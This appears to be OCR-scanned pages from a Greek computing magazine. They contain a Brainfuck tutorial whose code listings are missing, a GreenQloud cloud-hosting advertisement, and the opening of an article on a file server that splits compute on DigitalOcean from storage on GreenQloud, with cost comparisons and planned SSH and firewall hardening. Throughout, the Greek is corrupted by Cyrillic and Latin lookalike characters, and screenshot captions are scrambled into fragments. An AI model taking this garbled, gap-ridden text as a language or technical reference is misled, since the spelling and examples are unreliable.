(esoteric languages). Н Brainfuck αναπτύχθηκε ro 1993 ano τον Urban Müller, µε 
μοναδικὀ σκοπὀ va αποτελέσει τη γλὠσσα µε τον μικρότερο compiler nou μπορεὶ 
να υπάρξει. Περιττὀ να πούμε бт! αυτός ο στὀχος EXE! επιτευχθεί, αφού ορισμένοι 
compilers ¿xouv φτάσει στο εντυπωσιακά µικροσκοπικὀ μέγεθος των 100 bytes!. Н 
δοµἠ της Brainfuck εἶναι βασισμένη σε αυτήν της γλὠσσας P” (http://en.wikipedia. 
org/wiki/P%E2%80%B2%E2%80%B2) κι έχει εμπλουτιστεί µε δύο μόνο εντολὲς, για την 
εἰσοδο και την ἑξοδο δεδομένων. 


Πιο Λακωνικὀς κι απὀ Σπαρτιάτης 


Н Brainfuck διαθέτει μόλις окто εντολές, καθεμία апо τις οποίες συμβολίζεται µε 
£vav χαρακτήρα. Στην ακόλουθη γραμμὴ Φαΐνονται όλες οι εντολὲς της: 


Το μοντέλο λειτουργίας της Brainfuck στηρἰζεται σε va byte array, µε µἐγεθος 
τουλάχιστον 30000 κελιών. Το σύνολο των κελιὼν του πἰνακα αρχικοποιεἰται µε 
την τιµή μηδέν (0). Υπάρχει ἑνας δείκτης δεδοµένων (data pointer) µε τον onoio 
μπορούμε va κινούμαστε μεταξύ των κελιών του Nivaka, ενώ κάθε φορά μπορούμε 
να αυξάνουμε ἡ να HEIMVOUHE την τιµή του επιλεγμένου κελιού. Κατὰ την εκκίνηση 
κάθε προγράμματος, о δείκτης παραπέμπει στο прото кєлї του nivaka (µας αρέσει 
να ro φανταζόμαστε τέρμα αριστερά ;)) Τέλος, υπάρχουν δύο byte streams: Ένα 
για την εἰσοδο апо το πληκτρολόγιο κι Eva για την ἐξοδο προς την οθὀνη. Ta 
προγράμματα αλληλεπιδρούν µε το χρήστη µέσω aurov των δύο ροών. Ας δούμε 
тора και την ερμηνεία των εντολών. 


1. Μέγεθος που πετυχαίνει o compiler Tou Peter Ferrie, γραμμένος σε Assembly βεβαίως. Τον πηγαίο κὠδικα μπορείτε να βρείτε στη διεύθυνση 
http://pferrie.host22.com/misc/brainfck.htm 
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Αὐξηση του δείκτη ката µια µονάδα (μετακίνηση προς та 
δεξιὰ). 


Μείωση του δείκτη ката µια μονάδα (μετακἱνηση προς та 
αριστερά). 


Αὐξηση ката µια μονάδα της τιμής του επιλεγμένου κελιού. 


Μείωση κατὰ µια μονάδα της τιµής του επιλεγμένου κελιού. 


Ἐξοδος ενὸς χαρακτήρα στην οθὀνη. Н ASCII τιµή του 
χαρακτήρα λαμβάνεται απὀ το τρέχον κελὶ της μνήμης. 


Εἰσοδος ενός χαρακτήρα ano το πληκτρολόγιο και αποθήκευση 
της ASCII τιμής του στο τρέχον κελί της μνήμης. 


Αν η τιµή του επιλεγμένου κελιού εἶναι διάφορη του μηδενὸς, 
η εκτἐλεση του προγράµµατος συνεχίζεται апо την επόμενη 
εντολἠ. Διαφορετικά, το πρὀγραμμα συνεχίζει апо την εντολἠ 
που βρίσκεται αµέσως μετά апо την αντίστοιχη” δεξιά 
αγκύλη (1). Λέμε στην "αντίστοιχη" και ὀχι στην "επόμενη" 
δεξιά αγκύλη, διότι επιτρέπονται και οι φωλιασμένοι βρὀχοι 
(nested loops). 


Αν η τιµή του επιλεγμένου κελιού εἶναι διάφορη του μηδενὸς, 
η εκτέλεση του προγράµµατος συνεχίζεται από την EVTOAN 
nou βρἰσκεται μετά апо την αντίστοιχη αριστερἠ αγκύλη 

([). Ουσιαστικά, µε τη δεξιά αγκύλη (]) σηματοδοτείται o 
TEPHATIOHOG του κὠδικα που περιλαμβάνει ο βρὀχος. 


Τα προγράμματα στη Brainfuck συγκροτούνται αποκλειστικἁ ano τους παραπάνω 
окто χαρακτήρες - εντολὲς. Οποιοσδήποτε ἄλλος χαρακτήρας αγνοείται апо τον 
compiler της γλὠσσας και, ουσιαστικά, αντιμετωπίζεται σαν σχόλιο. Έτσι, μπορούμε 
να προσθέτουμε σχόλια πανεύκολα, кайт! που στην περίπτωση της Brainfuck εἶναι 
περισσότερο χρήσιμο апо κάθε ἄλλη γλὠσσα ;) 


Το прото µας πρόγραμμα 


Επειδή η Brainfuck δεν αποτελεἰ ша топік γλὠσσα προγραμματισμού, δεν θα 
ξεκινήσουμε µε το κλασικὸ "hello, world!". Θα ξεκινήσουμε µε кат! πιο απλὀ: Μια 
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απλἠ εκδοχἠ rou προγράμματος echo, το οποίο θα εμφανίζει στην οθόνη κάθε 
χαρακτήρα που δίνουμε, μέχρι να εισαχθεἰ ο χαρακτήρας NULL. Ορίστε o κὠδικας 
του προγράμματος: 


Ὄχι, δεν πρὀκειται για τυπογραφικὀ λάθος. Ολόκληρο το πρόγραμμα που 
περιγράψαμε απαρτίζεται апо αυτούς τους πέντε χαρακτήρες. Ας αναλύσουμε τον 
κώδικα χαρακτήρα προς χαρακτήρα και OX! γραμμὴ προς γραμμὴ, ὁπως κάνουμε 
συνήθως. О πρώτος χαρακτήρας διαβάζει £vav χαρακτήρα ano ro input stream 
και αποθηκεύει τον αντίστοιχο κωδικό ASCII στο кєлї που παραπέμπει ο δείκτης. 
Εφόσον βρισκόμαστε στο ξεκίνημα του προγράµµατος και δεν ἐχουμε τροποποιήσει 
τον δείκτη, ο KWOIKOG ASCII θα καταλήξει στο πρῶτο κελί του πἰνακα. Έτσι, αν για 
παράδειγµα πατήσουμε το κουμπί A, στο прото κελἰ του πίνακα θα αποθηκευτεἰ o 
αριθμὸς 65. To πρὀγραμμα συνεχίζει µε το χαρακτήρα της αριστερἠς αγκύλης, nou 
σηµατοδοτεἰ την ἐναρξη ενὸς βρὀχου. Εφόσον στο τρέχον κελὶ έχει αποθηκευτεί 
TO 65 και, τέλος πάντων, κάτι ἄλλο εκτὸς апо μηδὲν, θα ξεκινήσει η εκτέλεση TOU 
περιεχομένου του βρόχου. Μέσα στο βρόχο συναντάμε το χαρακτήρας της τελείας, 
που μεταφέρει στο output stream την τιµή του τρέχοντος κελιού. Έτσι, ο χαρακτήρας 
µε κωδικὀ ASCII το 65 (δηλαδή то A) θα εμφανιστεί στην οθόνη. Στη συνέχεια 
συναντούμε пал! την εντολἠ εισόδου (,). Εφόσον δεν ἐχουμε µετατοπίσει καθόλου 
το δείκτη, ο κωδικός ASCII του νέου χαρακτήρα που δίνουμε θα αποθηκευτεἰ στην 
ἴδια θέση και θα αντικαταστήσει την τιµή 65. Τέλος συναντάμε το χαρακτήρα της 
δεξιάς αγκύλης, που δηλώνει τον τερματισμὀ rou βρὀχου. Αν η αποθηκευμένη τιµή 
στο τρέχον κελὶ εἶναι διάφορη του μηδενὸς, η ροή του προγράµµατος θα μεταφερθεί 
στην αμέσως προηγούμενη αριστερἠ αγκύλη και dpa στο ξεκίνημα του βρὀχου. Έτσι, 
ο βρόχος nou περιγράψαµε συνεχίζει να εκτελείται ἕως ότου εισάγουµμετο χαρακτήρα 
NULL, ο οποίος έχει σαν κωδικὀ ASCII ro 0. Май! µε ro βρὀχο θα τερµατιστεἰ και το 
πρὀγραμµα, αφού δεν υπάρχουν άλλες εντολές. 


Σ' GUTO το σημείο, Ooo! ξεπεράσουν τη Салаба που προκαλεί ο κὠδικας σε Brainfuck, 
ενδἐχεται να διαμαρτυρηθούν: Пос εἶναι δυνατὀ va εισάγουµε апо το πληκτρολόγιο 
το χαρακτήρα NULL; Н αλήθεια εἶναι ӧт κάτι τέτοιο δεν εἶναι εφικτὀ. Έτσι, 
αποφασίσαμε να δημιουργήσουμε µια παραλλαγή του προγράµµατος, στην οποία o 
βρόχος Ва τερματίζεται όταν εισάγουµε τον χαρακτήρα του κενού (κωδικός ASCII 
32). Αναρωτιἐστε noc да πραγµατοποιήσουµε auróv τον ἐλεγχο; Όπως ἐχουμε πει, 
о χαρακτήρας τερματισμού των βρὀχων κάνει τη δουλειά του (δηλαδἠ τερματίζει τον 
εκάστοτε βρὀχο), μόνον όταν η τιµή του τρἐχοντος κελιού εἶναι 0. E, λοιπὀν, αφού 
ἐτσι ἐχουν τα πράγματα, θα πραγματοποιούµε τον ἐλεγχο αφού προηγουμένως 
αφαιρέσουμε 32 μονάδες апо την τιμὴ του τρέχοντος κελιού! Έτσι, η συγκεκριμένη 
τιµή θα μηδενίζεται μόνον ὀταν έχουμε δώσει το χαρακτήρα του κενού, ο οποίος EXE! 
κωδικὀ ASCII ro 32. Тора χρειάζεται λίγη προσοχή: Στην περίπτωση nou o βρὀχος 
δεν πρέπει να τερματιστεί, ο χαρακτήρας που δώσαμε πρέπει va εμφανιστεί στην 
οθόνη. Ακριβώς ү" αυτό, πρέπει να προσθέσουμε τις 32 μονάδες που αφαιρέσαµε 
προηγουμένως, ὥστε να σχηματιστεἰ και NGAI ο κωδικὸς ASCII. Απλό δεν εἰναι; Δείτε 
και την ανανεωμένη μορφή του κὠδικα: 
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Πα μεγαλύτερη ευκολία στην ανάγνωση, av και κἀτι τέτοιο αποτελεί αστεἰο στην 
περίπτωση της Brainfuck, το πρὀγραμμὰ µας θα μπορούσε να γραφτεί και ἐτσι: 


Н αφαίρεση 32 μονάδων ano την τρέχουσα τιµή του κελιού που βρισκόμαστε, 
επιτυγχάνεται µε την εκτέλεση της εντολἠς μείωσης (-) 32 φορὲς. Αντίστοιχα, η 
αὐξηση ката 32 μονάδες πραγματοποιείται µε την εκτέλεση της εντολἠς αὐξησης 
(+) 32 φορὲς. 


Αν και το παράδειγμά µας εἶναι πολύ απλὀ, προσφἑρει ша KAGAN γεύση του 
προγραμματισμοὐ σε Brainfuck. Ωστόσο, δεν εἰδαμε καθόλου τις εντολὲς 
μετακίνησης του δείκτη. Δε νομίζετε От! πρέπει να κάνουμε κάτι ү" αυτό; Εμείς 
πάντως то νομἰζουμε -- και ү" auró θα παρουσιάσουμε Eva ακόµα πρὀγραμμα: To 
κλασικό "Hello World!" 


Αντίο KOOPE 


Όπως εἰδαμε, η εντολἠ της τελείας εμφανίζει στην οθόνη το χαρακτήρα που 
βρίσκεται αποθηκευμένος στο τρέχον кєлї. Επιπρόσθετα, γνωρίζουμε бт! στο 
ξεκίνημα ενὸς προγράμματος ὁλα та κελιά παΐρνουν την τιµή μηδὲν. Επομένως, 
για va εμφανίσουμε Eva συγκεκριµένο χαρακτήρα στην οθὀνη, πρέπει прота να 
προσθέσουμε τόσες μονάδες στο τρέχον келі, ὁσες απαιτούνται για να σχηματιστεί о 
επιθυμητὀς κωδικὸς ASCII. Στη συνέχεια арке! να εκτελἐσουµε την EVTOAN της τελείας. 
Πα παράδειγµα, δείτε τον κὠδικα που απαιτείται για την εκτύπωση του χαρακτήρα "Н" 
(κωδικός ASCCI 72). Υποθέτουμε бт! το πρὀγραμμἁ µας μόλις ξεκίνησε και το τρέχον 
КЕЛІ ἔχει την τιµή μηδὲν. Έτσι, προσθέτουμε 72 μονάδες και εκτελούµε την εντολἠ 
της τελείας: 


H παραπάνω λύση, отау θέλουμε va τυπώσουμε vav χαρακτήρα και μόνο, εἶναι 
υποφερτή. Ὅταν ὀμως σκοπεύουμε va τυπώσουμε Eva ολὀκληρο μήνυμα, η 
συγκεκριμένη προσέγγιση γίνεται φρικτἠ. Па να επιβιώσουμε στον κόσμο της Brain- 
fuck, πρέπει va επιστρατεύσουµε και την τελευταία σταγόνα ευρηματικότητας. Μια 
καλύτερη λύση, λοιπὀν, εἶναι να δημιουργήσουμε Eva βρόχο που προσθέτει δέκα 
μονάδες, να τον εκτελἐσουµε 7 φορὲς και στη συνέχεια να προσθέσουμε ἄλλες δύο 
μονάδες. Δείτε τον κώδικα: 
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Αρχικἁ αποθηκεύουµε την TIEN επτά, στο τρέχον кєлї. Όπως αντιλαμβάνεστε, η тїнї 
του τρἐχοντος κελιού θα παΐξει το ρόλο TOU µετρητἠ και ο βρόχος θα επαναλαμβάνεται 
EWG OTOU αυτὀς ο µετρητής µηδενιστεἰ. О βρὀχος ξεκινά µε τη µείωση της τιµής του 
τρέχοντος κελιού. Στη συνέχεια μετατοπιζόμαστε στο επὀμενο κελί, προσθέτουμε 
δέκα μονάδες και αµέσως μετά επιστρέφουµε στο προηγούμενο κελί. Εφόσον η τιμὴ 
αυτού του κελιού (δηλαδἠ του μετρητἠ) δεν EXE! μηδενιστεί, επαναλαμβάνεται o 
κώδικας rou βρόχου. Με αυτὀ τον τρόπο, ο κὠδικας που προσθέτει δέκα μονάδες στο 
επόμενο κελἰ, θα εκτελεστεί ENTA φορές. Χρησιμοποιώντας nio προσφιλεὶς όρους, θα 
μπορούσαμε να πούμε OT! το κελἰ 0 χρησιμοποιείται σαν µια προσωρινἠ μεταβλητή, 
EVO TO κελἰ 1 αποτελεἰ τη μεταβλητή στην οποία θέλουμε να προσθέσουμε Tic επτά 
δεκάδες. Όταν ολοκληρωθούν οι επαναλήψεις του βρόχου, µετατοπιζόμαστε πάλι 
στο ENOHEVO кєлї, προσθέτουμε δύο ακόµα μονάδες και μετὰ EKTEAOUHE την EVTOAN 
της εκτύπωσης. 


Μπορεί To колпак! µε ro βρόχο να σας φάνηκε σύνθετο, алла περιορίζει σημαντικά 
την πιθανότητα να κάνουμε κάποιο λάθος στο μέτρημα των χαρακτήρων και, τελικά, 
στο πλήθος των μονάδων που θα προστεθούν σε Eva кєлї. Με τη βοήθεια αυτού 
του μικρού τεχνάσµατος θα φτιάξουμε και To "Hello World!". Εξετάζοντας τους 
κωδικούς ASCII των γραμμάτων που σχηματίζουν auró το μήνυμα, διαπιστώνουμε 
ότι θα βόλευε va ἐχουμε εὐκαιρους τους αριθμούς 70, 100, 30 και 90. Έτσι, θα 
φροντἰσουμε να τους σχηµατίσουµε σε τἐσσερα διαδοχικἀ κελιά της μνήμης... 
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Н επεξήγηση του κώδικα εἰναι περιττή, αφού γι’ αυτό έχουμε τα ἄκρως περιγραφικἁ 
σχόλια. Αν αφαιρούσαμε τα σχόλια και όλους τους περιττοὺς χαρακτήρες (τα κενὰ 
και τις αλλαγές γραμμών) το πρὀγραμμὰ µας θα έπαιρνε την ακόλουθη μορφή: 


Τι ἐχετε να πείτε ropa; Ελπίζουμε aurr| η τελευταία παράθεση κὠδικα να σχημάτισε 
και στο δικό σας πρόσωπο Eva χαμόγελο! Σ' εμάς πάντως τα κατάφερε και, όταν 
ξεπερἀσαμε αυτή την арҳікд хара (καιτην παραζάλη), αποφασίσαμε να ασχοληθούμε 
περισσότερο µε τη Brainfuck. Αν σας avoi&aue την ὀρεξη, προτείνουμε να μεταβείτε 
στη σελἰδα 46 και va συνεχίσετετη γνωριμία µε αυτή την απλοϊκή αλλά cuvapnaorikd 
περίπλοκη γλὠσσα. 
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YOUR VERY OWN PLAYGROUND IN THE CLOUD. 
SECURE & GREEN. PAY AS YOU GO. 


Keep your data in Iceland and take advantage of GreenQloud's cloud 
services powered by abundant, stable and cost effective, clean energy 


* Network separation at the 


* Up to 16 CPUs and 32gb RAM 
hardware level 


in the KVM hypervisor 


O 


* 64-bit server image templates “ Dedicated IP address апа 
including Ubuntu, Debian, reserved bandwidth 


FreeBSD, CentOS and more 
* EC2 compatible 


ComputeQloud™ 


Host & Manage 


* Built-in firewall 
* Instant scalability 


* In-browser noVNC client and 


full root access via ssh 


C 


* Triple-redundant storage 
* Full encryption 


* Sync across all platforms 


StorageQloud™ 


Backup & Share 


* Online dashboard 


* S3 compatible 
* Bucket websites 


* Automatic load-balancing 


For more information visit our webiste: www.greengloud.com 


φορὲς που θα 'χετε ακούσει rj даза 
Ακριβώς ү αυτό, ion µε 0 εἶναι η п 
ενός τέτοιου Setup. Την ἴδια στιγµἠ, i 
шоор να στήσετε ἐναν server "ora 
απλά στο σύνεφο. 
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Στεφτεἰτετο. Όταν μιλάμε үа Eva VPS στο cloud, στην πραγματικότητα αναφερόµα- 
στε σε Eva VM που κατοικεἰ σε συγκεκριµένο datacenter, µιας συγκεκριμένης εται- 
peiac (cloud host). Ката περιπτώσεις παρέχεται η δυνατότητα αλλαγἠς datacenter, 
διαδικασία επιθυμητή όταν θἐλουµε να βελτιώσουμε την ταχύτητα πρὀσβασης, o£p- 
νοντας ουσιαστικά τον server πιο κοντὰ στην πλειονότητα των clients – ακόµη κι 
όταν μιλάμε үа vav µόνο client (εμάς). Ανεξαρτήτως ὁμως rou datacenter, o server 
βρίσκεται στο cloud της εκάστοτε εταιρείας. Αυτό δεν εἶναι παράξενο, οὐτε βἐβαια 
αρνητικὀ. Μόνο που μερικὲς φορὲς συμφέρει o server µας να "εκτείνεται", κατὰ кӣ- 
ποιον τρόπο, σε δύο διαφορετικἁ clouds, δύο διαφορετικών εταιρειών. 


Αντἰ тора να συνεχίσουμε µε µια γενικὴ συζήτηση για то τι μπορεί να εννοούμε μ' 
αυτὸ που μόλις γράψαμε, επιτρἐψτε µας να παρουσιάσουμε ἑνα πραγματικὀ, δικό 
μας σενάριο, ὅπου μετὰ апо διερεύνηση των δυνατοτήτων αποφασίσαμε και στἠ- 
caue £vav server που εκτείνεται σε δύο clouds: της DigitalOcean (compute) και της 
GreenQloud (storage). 


Διαχωρισμός compute και storage 


Εδὠ και τουλάχιστον Eva χρόνο, ra Ψηφιακά τεύχη του μηνιαίου περιοδικού καθὼς 
και Ta video tutorials που ката καιρούς παράγουµε, τα διαθέτουμε στους συνδροµη- 
TEC µας ano vav file host που έχουμε στήσει σε VPS της GreenQloud. To λειτουργικὀ 
του VPS εἶναι ro Ubuntu Server και τρέχει το ownCloud, αφού µε τη βοἠθειἁ του 
εἶναι πανεύκολο να φτιάχνουμε expiring links προς τα αρχεία που διανέµουμε (PDFs 
και MP4s) ἡ ακόµη και προς ολόκληρους φακέλους µε αρχεία. Av, π.χ., αγοράσει 
κάποιος τα τεύχη του deltaHacker ano το 001 έως και το 012, τότε του στέλνουμε 
δύο expiring links προς δύο φακέλους, ο καθένας µε έξι τεύχη. (Μας βολεύει va op- 
γανώνουμε τα τεύχη σε єЕйбєс και τη στιγμὴ που γράφεται το παρὸν εἶμαστε πολύ 
κοντά στο να έχουμε 7 πλἠρεις θάδες :D) Το συγκεκριµένο instance -ἐτσι ονομάζει 
η GreenQloud та VPS της-, εκτὸς ano ro ρὀλο file host ἐχει κι εκείνον TOU OpenVPN 
server. Δεν τον χρησιμοποιούμε συχνὰ, αλλά μερικὲς φορὲς rov τιμάμε και µας Bo- 
λεύει. To instance τρέχει και το BitTorrent Sync, то οποίο εἶναι ὁ,τι πρέπει για Tov 
EUKOAO συγχρονισμό αρχείων - ειδικἁ όταν ἐχουμε να κάνουμε µε μεγάλα αρχεία. 


Το кало µε τη GreenQloud, εκτός του бт! εἶναι Ισλανδική εταιρεία Kal στη χώρα 
υπάρχει ισχυρή νομοθεσία UNEP των ιντερνετικὠν ελευθεριών και του privacy, εἶναι 
πως για τη λειτουργία rov datacenter της χρησιμοποιούνται 100% ανανεώσιμες και 
καθαρές μορφές ενέργειας. Καταλαβαίνουμε βέβαια бт! αυτό δεν μπορεἰ v' αποτελεὶ 
για όλους πλεονέκτημα, το αναφἐρουµε ὁμως αφού για κἀποιους εἶναι πράγματι 
опраутіко. Εστιάζοντας σε προτερήματα που αφορούν ἄμεσα κάθε πελάτη της εται- 
ρείας, ξεχωρίζουμε το ката Amazon S3 συμβατὸὀ σύστημα αποθήκευσης ονόματι 
Storage Qloud. Δεν θα υπεισέλθουµε σε TEXVIKEG λεπτομέρειες, αλλά θα πούμε µόνο 
ότι µε TO Storage Qloud έχουμε στη διἀθεσή µας Eva ἡ περισσότερα "buckets", та 
οποία ξεκινούν ἁδεια και μεγαλώνουν απεριόριστα. Το кало εδὠ εἰναι ότι πληρώ- 
νουµε *роуо* για το χώρο nou праүратіка χρησιμοποιούμε (0,095 δολάρια ауа GB 
avd μήνα). Av και υπάρχουν ἑνα σωρό τρόποι για v' ανεβάζουμε και να κατεβάζουμε 
αρχεία ano ra buckets του Storage Qloud, ro εντυπωσιακὀ εἶναι бт! μπορούμε va 
τα προσαρτούµε (mount) στα Linux-based instances που ενδεχομένως ἐχουμε. Και 
λέμε "ενδεχομένως", αφού δεν εἶναι υποχρεωτικὀ να διατηρούµε κάποιο instance 
στη GreenQloud. H προσάρτηση εἶναι εφικτἠ ano οποιοδήποτε VPS ενὀς οποιουδἠ- 
ποτε cloud host, ano ra VMs κι апо τους servers που EXOUHE στο σπίτι ἡ στο γραφείο 
- ακόμη κι апо το ταπεινὀ µας Raspberry Pi. Χάρη oro Storage Qloud, λοιπὀν, ano 
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€ " greengloud.com 


Server Offering Small 


Number of servers 


Outgoing bandwidth 


(© ESTIMATED TOTAL: 


* Bandwidth In is free 
* Additional server storage $0.10 GB/month 


* Free Loadbalancer usage 


[ΠΠ 2048MB RAM 


е| азе пез ао Ф a 


PRODUCTS . 


ABOUTUS * COMMUNITY * TRULY CREEN 


$F 2 core cpu [ 208 Disk 


(рег month) | (per hour) 


* Bandwidth Out $0.08 per GB/month (178 free per account) 
Additional public IP address $2/month 


* Free Firewall 


e 


Λίγες μόνο συγκρίσεις εἶναι αρκετές yia v' αποφασίσουµε σε ποιον cloud host 
θα βρίσκεται το compute µέρος rou server µας. 
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οποιοδήποτε Linux-based μηχάνημα -εικονικὀ ἡ φυσικὀ δεν ἐχει σηµασία-, £xoupe 
τη δυνατότητα να προσαρτούµε Evav ἡ περισσότερους δίσκους (buckets) στο cloud, 
οι οποίοι διευρύνονται ἡ συρρικνώνονται δυναμικά κι αναλόγως των δεδοµένων που 
περιλαμβάνουν. Φυσικά, οι μεταφορές και η διαχείριση των αρχείων στα buckets 
γίνεται κατὰ τους συνηθισμένους τρόπους, αφού για το λειτουργικὀ σύστημα ta 
buckets αποτελούν απλούς καταλόγους του συστήματος αρχείων. 


Οφεἰλουµε тора v' αναφἐρουµε KI Eva ҳарактпріотіко της GreenQloud, το οποίο 
δεν συγκαταλέγεται στα θετικἀ: Δεν πρὀκειται για τον πιο φθηνό cloud host Ekei 
Έξω (TM). Λογικό, αφού δεν απευθύνεται τόσο σε μεμονωμένους χρήστες, παρά σε 
εταιρείες που θέλουν να στήσουν ἠ/και va μεταφέρουν ολόκληρα δίκτυα στο cloud. 
Στην πράξη, λοιπὸν, Eva τυπικὀ instance της GreenQloud κοστίζει υπερδιπλάσια 
χρήματα, σε σχέση µε Eva VPS παρόμοιων δυνατοτήτων ἄλλης εταιρείας. 


Και κάπου εδώ μπαίνει στο παιχνίδι η DigitalOcean. Εἶναι ἑνας σχετικἁ νέος αµερι- 
Kavikoc cloud hosting provider, ο οποίος ἐγινε γρήγορα γνωστὸς χάρη στο απλὀ web 
panel διαχεἰρισης που παρέχει αλλά *kupiwc* επειδή ἦταν апо τις πρώτες εταιρείες 
που εἶχαν -και συνεχίζουν va ἐχουν- ra VPS τους σε δίσκους SSD. Н DigitalOcean 
λειτουργεί datacenters σε Σαν Φρανσίσκο, Νέα Υόρκη, Λονδίνο, Ἀμστερνταμ και 
Σιγκαπούρη, µε τον πελάτη να ἐχει δυνατότητα επιλογἠς datacenter, καθώς και 
μετακίνησης των Droplets ano datacenter σε datacenter. Та VPS η DigitalOcean ra 
ονομάζει "Droplets" και τα προσφέρει σε ιδιαἰτερα χαμηλὲς τιμὲς – σίγουρα xaunAó- 
τερες σε σύγκριση µε αντίστοιχα instances της GreenQloud. 


Εξετάζοντας то δικὀ µας setup - για την ακρίβεια autò που αφορά στη διαµοίραση 
αρχείων σε συνδρομητὲς-, φαίνεται ξεκάθαρα yiari αποφασἰσαµε να το "απλώσου- 
με" σε GreenQloud *kar* DigitalOcean. Μέχρι πρὀτινος εἶχαμε Eva instance µε 2GB 
RAM, δύο πυρήνες και отдутарт αποθηκευτικὀ χώρο 80GB. Διανύουμε τον 40 χρόνο 
κυκλοφορίας του deltaHacker και μέχρι σήμερα ο συνολικός ὀγκος των αρχείων 
(PDFs και MP4s) nou διανέµουµε ανέρχεται στα 17GB. Με το ρυθμό που αυξάνει το 
μέγεθος των δεδομένων που αποθηκεύουµε στο cloud, τα 80GB εἶναι αρκετά και θα 
παρέμεναν αρκετά για αρκετό каро ακόμα. Να σημειώσουμε Ori επειδἠ θέλαμε va 
δοκιµάσουµε στην πράξη ro Storage Qloud, αυτά τα 17GB στην πραγματικότητα τα 
εἰχαμε -και θα συνεχίσουμε να ra ἐχουμε- οργανωμένα σε δύο buckets (deltaHacker 
και deltaCast). Το κόστος αποθήκευσης στο Storage Qloud εἶναι 0,095 δολάρια ava 
СВ ауа µήνα, οπὀτε μιλάμε τώρα бт! για To Storage Qloud και ειδικἀ για τα αρχεία 
του περιοδικού, τον τελευταίο μήνα πληρώσαμε 1,62 δολάρια, δηλαδή περίπου 1,48 
ευρώ. Evo όμως µε το κομμάτι storage δεν υπάρχει οικονομικὀ ζήτημα, η κατάστα- 
ση δεν εἶναι τόσο ρὀδινη µε TO compute. Θέλαμε o server µας (instance) va ἐχει 
τουλάχιστον 2GB RAM και δύο επεξεργαστὲς, αφού κάποιες μέρες TOU µήνα δέχεται 
πολλὲς αιτήσεις για λήψη αρχείων και προφανώς кало εἶναι va µη ζορίζεται. Πόσο 
κοστίζει Eva τἐτοιο instance, avd μήνα; 52,56 δολάρια. Πόσο κοστίζει Eva παρόμοιο 
Droplet στη DigitalOcean; 20 δολάρια. Όχι, δεν πρὀκειται περὶ λάθους: 52,56 δολά- 
pia στη GreenQloud, 20 δολάρια στη DigitalOcean. 


Στις Μέρες Μας (TM), φίλες και φίλοι, κανεὶς δεν θέλει να κάνει περιττά έξοδα, onó- 
τε η συνέχεια για 'μας ἦταν προφανἠς: Κρατάμµε το κομμάτι storage στο Storage 
Qloud της GreenQloud, καραργούμε ὁμως ro instance και ουσιαστικά µεταφἑρου- 
µε το κομμάτι compute στη DigitalOcean, δημιουργώντας εκεἰ Eva Droplet των 20 
δολαρίων avd μήνα. Χάρη στο Storage Qloud που δέχεται mounts апо οπουδήποτε 
στον πλανήτη, yia να φτάσουμε να πληρώνουμε 52,56 δολάρια θα πρέπει прота v' 
ανεβάσουμε τουλάχιστον 342GB στο Storage Qloud. Ακόμη κι av αυξήσουμετο ρυθ- 
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© Storage Qloud™ - GreenQl... x 


OLIA pm rete Φ 459 


ἘΣ PRODUCTS + ABOUTUS + COMMUNITY” TRULYGREEN 


Overview Securit Applications User interface A Truly Green™ 


Cloud storage for everyone 


Secure files to develop a highly scalable web app 


Storage Qloud™ Pricing Calculator 


Unlimited storage $0.095 per GB/month. Storage Qloud™ is charged by your average usage per month. 


Storage 
C 


068 10GB 2068 30GB 40GB 60GB 8068 16068 320GB 640GB 178 278 


Outgoing Bandwidth 
© 


1тв 1518 


Estimated Monthly Total: $3.80 


О ὀγκος των δεδοµένων που σερβίρουμε, τρία και πλέον χρόνια µετά την 
κυκλοφορία rou deltaHacker 001, ανέρχεται στα 17GB. О ρυθμός αύξησης 
TOU ὀγκου αναμένεται να επιταχυνθεί μέσα στη χρονιά, алла θέμα κόστους 
δεν υπάρχει. Παράδειγμα: Όταν φτάσουμε τα 40GB, για ro Storage Qloud της 
GreenQloud θα πληρώνουμε 3,8 δολάρια ava μήνα. Κάπως ἐτσι αποφασίσαμε 
για то πού πρέπει να βρίσκεται To storage µέρος του server µας. 


ро παραγωγἠς περιεχομένου -κάτι που οὕτως ἡ ἄλλως προγραμματίζεται να γἰνει-, 
θα χρειαστεί να περάσει αρκετὸς καιρὸς για να φτάσουμε στα 100GB, πόσο μάλλον 
στα 342. 


Τι ακολουθεἰ 


Στο παρὀν αφιέρωμα παρουσιάζουμε, αναλυτικἁ και βήμα προς βήμα, τις εργασἰες 
nou ακολουθήσαμε για τη δηµιουργία ενὸς νέου file host (eyjafjallajokull.parabing. 
com), o οποίος αντικαθιστά τον пало (icebox.parabing.com) και συνεχίζει κι αυτός 
να Χρησιμοποιείται *kupioc* yia το роірасра ψηφιακών τευχών και video tutorials 
στους συνδρομητὲς rou deltaHacker. Βεβαίως, τεράστια διαφορὰ σε σχέση µε τον 
παλιὀ file host αποτελεἰ το γεγονὸς OT! το eyjafjallajokull έχει το compute κομμάτι 
στη DigitalOcean, αλλά ro storage κομμάτι εἶναι στη GreenQloud. Αναλυτικότερα, 
στο αφιἐρωμὰ µας θα δούμε: 

ο τη δηµιουργία ενὸς Droplet στη DigitalOcean, καθώς και τις ρυθμίσεις DNS που 

το αφορούν 


ο την αρχικἠ ρύθμιση του λειτουργικού συστήματος που τρέχει το Droplet 
(Ubuntu Server 14.04 LTS) 
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ЕЕЕ ССС 


E Droplet Hostname 


Droplets eyjafjallajokull 
Images 


SSH Keys а 
Select Size 
Billing 


Эрот 55/mo $10 imo по 380/mo 


DNS 50 007 /πους $0.015 /hour 0.0: ur 50/19 /hour 


Apps & API 50 мВ 152 168 
20 GB SSD к 306855 
1000 GB Transfe 2 ТВ Trensfe: 


=Æ Settings 


ida at $160 mo $320 mo 


$0238 mour 50.476 incur 


16 68/8 CPUs 3268/12 CPUs 
160 GB 550 Disk 
6 TB Transfe 7187 


Select Region 


EZ 
LZ 
Singapore London 


1 1 


την ενίσχυση της ασφάλειας του λειτουργικού µε τη βοήθεια rov ipatables 
και fail2ban, καθώς και µε την τροποποίηση του OpenSSH ὥστε, π.χ., να µην 
περιμένει συνδέσεις στο προκαθορισμένο port και v' απορρίπτει то password- 
based authentication 

τη δηµιουργία ενὸς νέου λογαρισμούὐ απλού χρήστη, o οποίος θα unopsi v' 
αποκτά δικαιώματα διαχειριστή ὀποτε τα χρειάζεται (θα απενεργοποιήσουμµε τη 
δυνατότητα απομακρυσμένης σύνδεσης yia τον root) 

την προσάρτηση buckets του Storage Qloud, µε χρήση του εργαλείου 535 


την εγκατάσταση και ρύθμιση rou BitTorrent Sync, yia τον εὐκολο συγχρονι- 
σμὀ αρχείων 

